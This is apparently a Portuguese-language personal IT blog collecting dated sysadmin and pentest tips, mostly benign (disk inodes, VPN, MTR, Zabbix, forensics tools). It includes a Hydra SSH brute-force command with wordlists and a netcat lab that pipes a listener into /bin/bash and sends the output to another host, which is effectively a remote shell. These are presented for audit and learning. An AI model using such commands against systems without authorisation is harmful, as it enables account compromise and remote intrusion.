segunda-feira, 23 de agosto de 2021

Endian - Sem Espaço em Disco

 Boa tarde !

Senhores,

hoje fui tentar fazer backup o backup no Servidor Endian de um Cliente e me deparei com esse erro:


Pela imagem parece algo intuitivo, entretanto segue o resultado o comando: df -h

Filesystem     Type   Size  Used Avail Use% Mounted on
/dev/sda3      ext3    44G   36G  6,0G  86% /
tmpfs          tmpfs  934M     0  934M   0% /dev/shm
/dev/sda1      ext3   485M  129M  331M  29% /boot
/dev/sda2      ext3   100G   90G  4,7G  96% /home

Veja que existe espaço no disco, ou seja pra identificar o que esta acontecendo tive que rodar outro comando (df -ih)

Filesystem           Inodes IUsed IFree IUse% Mounted on
/dev/sda3              2,8M  2,8M     0  100% /
tmpfs                  234K     1  234K    1% /dev/shm
/dev/sda1              126K    62  125K    1% /boot
/dev/sda2              6,3M   21K  6,3M    1% /home

A partir daí da pra entender a falta de espaço e mitigá-la, no caso eu tive que apagar todo log do Serviço "Traffic Monitor", isso liberou espaço em disco e consegui realizar novamente backup.


Segue link:

https://www.bfnetworks.com.br/no-space-device-linux/


Espero te ajudado.

Abraço.



sexta-feira, 23 de julho de 2021

Kali Linux - WPSCAN

 Boa tarde !

Senhores,

aqui demonstro como usar o WpScan para encontrar fragilidade em site criados em WordPress e corrigi-los numa possível auditoria em sua empresa usando o Kali Linux.

Passo  I - Atualizar o wpscan

cd /usr/share/wpscan

ruby wpscan.rb -update


Passo II - Colhendo informações de sites

wpscan -url <site> <variante>


Lembre-se que essa ferramenta deve ser utilizada de forma consciente e não invasiva ou para fins ilicitos.


Espero ter ajudo.

Abraço.




sábado, 26 de dezembro de 2020

VPN SSL - OpenFortiVPN - Fedora Linux

 Boa tarde !

Senhores,

segue um macete/necessidade que acabei de ter e já esta em produção.


Habilitei uma VPN no Linux através do OpenFortiVPN de forma bem simples.

Segue link:

https://blog.mdda.net/oss/2018/10/12/openfortivpn-on-fedora


Sintaxe:

openfortivpn <ip_concentrador>:<porta>/Perfil -u <user> --trusted-cert <chave_criptografica>


Espero ter ajudado.

Abraço.



terça-feira, 30 de junho de 2020

Usando o Hydra - Brute Force/Word List - Linux

Boa tarde !
Senhores,
outra formidável ferramenta para PenTest, com ela você consegue Testar/Validar a Segurança de seus Servidores quanto a Users/Senhas simples.

Usando Wordlist (User e Password):
hydra -L userlist.txt -P senhalist.txt 192.168.89.1 ssh

Quando sei o User e Password/Wordlist:
hydra -l fulano -P senhalist.txt 192.168.89.1 ssh

Segue links:
https://fedora.pkgs.org/30/fedora-x86_64/hydra-8.9.1-1.fc30.x86_64.rpm.html
https://pt.wikipedia.org/wiki/Lista_de_portas_dos_protocolos_TCP_e_UDP

*Obs.: Usar só para fins Acadêmicos.

Espero ter ajudado.
Abraço !

Usando o John - Segurança de Senha - Linux

Bom dia !
Senhores,
pra quem deseja validar senhas em seus Servidores, esse é um ótimo programa. Com ele você vai conseguir avaliar em quanto tempo esse aplicativo consegue quebrar senhas fracas. Ótimo para auditoria interna.

Segue link:
https://www.cyberciti.biz/faq/unix-linux-password-cracking-john-the-ripper/
https://www.poftut.com/how-to-install-john-the-ripper-to-windows-and-linux-ubuntu-debiankali-fedora-centos/

Detalhe, você não precisa ter o Kali instalado, fiz meus testes em um Host com Fedora.

Espero ter ajudado.
Abraço !

segunda-feira, 15 de junho de 2020

Recuperar Dados apagados do Instagram

Boa tarde !
Senhores,
um amigo me perguntou se havia como, nunca tinha feito, fui pesquisar.

Encontrei esse Artigo na Internet, fiz o procedimento e funcionou.

Segue o link:
https://www.apptuts.net/tutorial/redes-sociais/como-recuperar-mensagens-apagadas-no-instagram/

Espero ter ajudado.
Abraço !

terça-feira, 26 de maio de 2020

Quarentena com Estudo - Cisco Cibersegurança

Bom dia !
Senhores,
nesse momento crítico que o mundo vive, pra quem trabalha Home Office, nada melhor do que se dedicar aos estudos nos tempos livres, segue minha contribuição:

https://www.oas.org/pt/ssm/cicte/cursos-cisco/

A Cisco oferece dois Cursos em Cibersegurança, gratuitos para você aprender mais sobre o assunto, nesse momento de Pandemia.

- INTRODUÇÃO À SEGURANÇA CIBERNÉTICA
- FUNDAMENTOS DE SEGURANÇA CIBERNÉTICA

Bons estudos, espero ter ajudado.
Abraço.

segunda-feira, 2 de setembro de 2019

NetCAT - Comunicação entre Hosts Remotos

Boa tarde !
Senhores,
ainda estudando o Kali Linux, aprendi uma ferramenta muito show de bola, o NetCat. Vi que dá pra fazer muitos testes com ele, mas o mais legal foi acessar um host remoto e receber o resultado dos comandos executados nele.

Vamos ao LAB:

Host A
IP: 192.168.1.200
Porta Open: 1513

Host B
IP: 192.168.1.201
Porta Open: 1514

Comando no Host A:
1 – Abrir uma porta em sua máquina
nc -l -p 1513

2 – Redirecionando o comando que será executado no host destino
nc -l -p 1513  | /bin/bash | nc 192.168.1.201 1514


Comandos no Host B:
1 – Abrir uma porta em sua máquina
nc -l -p 1514
*-> Aqui vai aparecer o resultado dos comandos digitados abaixo

2 – Acessar o host remoto
nc 192.168.1.200 1513
*-> Aqui você digita os comandos no host remoto.


Testei e funcionou 100%.

Link referência:

Espero ter ajudado.
Abraço.

terça-feira, 13 de agosto de 2019

Teste de Gravação/Leitura de HD - Linux

Boa tarde !
Senhores,
hoje tive uma dúvida sobre a velocidade de meu HD, vários travamentos e pouco uso de memória, ou seja, precisava testar o meu disco. Pra isso, usei o seguinte procedimento:

1 - Criação de um arquivo com zeros;
2 - Ler o arquivo.

Passo I 
dd if=/dev/zero of=testedisco bs=M count=512 - Com cache

Passo II
dd if=/dev/zero of=testedisco bs=M count=512 oflag=direct - Sem cache

Passo III
dd if=testedisco of=/dev/zero bs=M count=512

Origem/Função: dd if=
Destino/Nome do arquivo: of=
Tamanho do arquivo = bs=M count=512

Nesse artigo você tem a velocidade de um HD novo/modelo para você usar como referencia.

Link:
https://kb-pt.sandisk.com/app/answers/detail/a_id/8701/~/diferen%C3%A7as-entre-sata-i%2C-sata-ii-e-sata-iii

Espero ter ajudado.
Abraço.




sexta-feira, 2 de agosto de 2019

Recovery Arquivos Deletados - Kali Linux - Autopsy

Bom dia !
Senhores,
dando continuidade a saga de Recuperar Dados, primeiro encontrei o Software para Recuperar Dados de Dispositivos Formatados (Foremost), e agora estou estudando um software que serve para Recuperar Arquivos Deletados (Autopsy).
A ferramenta é show de Bola, voltada para Forense total. A diferença que encontrei entre eles é que o Foremost trabalha diretamente na Mídia, já o Autopsy tem que transformar esses dados em img e copiar para seu disco, para só depois trabalhar em cima dela (img).

Segue link:
https://hack4fun.club/2018/02/21/ferramentas-forensics-em-kali-linux/
https://www.youtube.com/watch?v=ypKzWNoBjmA

*Obs.: Fiz o teste e funcionou, assim como faço antes de postar.

Espero ter ajudado.
Abraço.

terça-feira, 30 de julho de 2019

Recovery DADOS - Kali Linux - Foremost

Bom dia !
Senhores,
estou conhecendo o Kali Linux, S.O. baseado em Debian feito para Auditoria/PenTest. Ferramenta show de bola. Hoje fiz um LAB sobre uma de suas ferramentas, como recuperar dados de um Disco/Pendrive/Memoria Flash, etc.

Fiz os testes e recuperou sem mais problemas, realmente muita boa a ferramenta.

S.O.: Kali Linux/Debian
Ferramenta: Foremost

Segue link:
https://www.100security.com.br/recuperar-dados-usando-foremost/

Espero ter ajudado.
Abraço.

quinta-feira, 6 de dezembro de 2018

PING + TRACEROUTE = MTR

Bom dia !
Senhores,
ontem me deparei com uma questão:

- Como saber se minha Internet esta lenta ou se o problema esta nos saltos na Internet até a chegada do meu Destino ?

Troubleshooting:
1 - Teste de velocidade de Internet;
2 - Pesquisar até o destino os saltos que vou ter e a latência entre esses saltos.

1 - Testes de velocidade de Internet:
  1.1 - Pesquisar no Google, encontrei vários, mas gostei muito do Speedtest

2 - Pesquisar até o destino os saltos que vou ter e a latência entre esses saltos.
  2.1 - Aqui entendi que não basta PING ou Traçar Rota, tem que saber o delay entre cada um dos saltos/AS e pra isso usei um ferramenta muito boa chamado MTR/Linux.

Segue Link:
https://traceroute-online.com/mtr/
https://wiki.mandic.com.br/atendimento/utilidades/ajuda/como-utilizar-o-mtr-no-linux
https://elias.praciano.com/2014/04/mtr-combine-os-comandos-ping-e-traceroute-no-linux/
http://www.speedtest.net/pt

Síntese
 - Com o MTR você vai saber o tempo que cada AS demora pra te responder e quanto saltos você vai ter até seu destino, com isso vai ficar claro se o problema esta na Rota percorrida e em qual AS esta o gargalo.

Espero ter ajudado.
Abraço.

terça-feira, 26 de junho de 2018

fping - Scaneamento ICMP via Linux

Bom dia !
Senhores,
segue uma opção para scanear sua rede via linha de comando/Linux.

Links:
https://elias.praciano.com/2014/02/use-o-fping-para-scanear-a-sua-rede/

Instalar o fping:
https://software.opensuse.org/package/fping
https://elias.praciano.com/2014/02/use-o-fping-para-scanear-a-sua-rede/

Calcular ranger de IPs:
http://www.ip-calc.com/

Espero ter ajudado !
Abraço.

terça-feira, 19 de junho de 2018

Zabbix - Monitoramento de Ativos

Bom dia !
Senhores,
pra quem precisa de um Monitoramento Profissional e com recursos variados, segue uma boa dica, o Zabbix, é uma Ferrari em sua área.

Links
https://www.zabbix.com/download - Server Linux
https://www.linuxnaweb.com/instalando-agent-zabbix-no-centos-rhel-6-e-7/ - Agent CentOS

Espero ter ajudado.
Abraço.

segunda-feira, 11 de junho de 2018

Cisco AP-Aironet 1250-Atualizar Firmware

Boa tarde !
Senhores,
semana passada precisei realizar esse processo e gostaria de compartilhar com vocês como foi realizado.

Passo I

 


- Setar conversor USB to Serial para ter acesso ao AP do seu computador.
Passo II


Acessar o Putty e configurar confirma a porta em quem o conversor esta.
Passo III

Abrir Tftpd e informar onde vai ficar o arquivo de atualização e colocar seu IP como Servidor.
Obs.: Lembrar de colocar sua placa de rede na mesma faixa de rede do AP, por padrão é:
10.0.0.0/24 – AP 10.0.0.1/24 – Colocar sua máquina entre os primeiros hosts, ou seja, até o IP 20.

Passo IV


 









- Segure o botão Reset e depois ligue o rádio com o botão pressionado, segure por uns 10 segundos e solte o botão, o Ap vai reiniciar de forma que vai procurar por sua IOS em um servidor FTP e vai encontrar o seu se estiver na mesma faixa de IP e com o arquivo correspondente.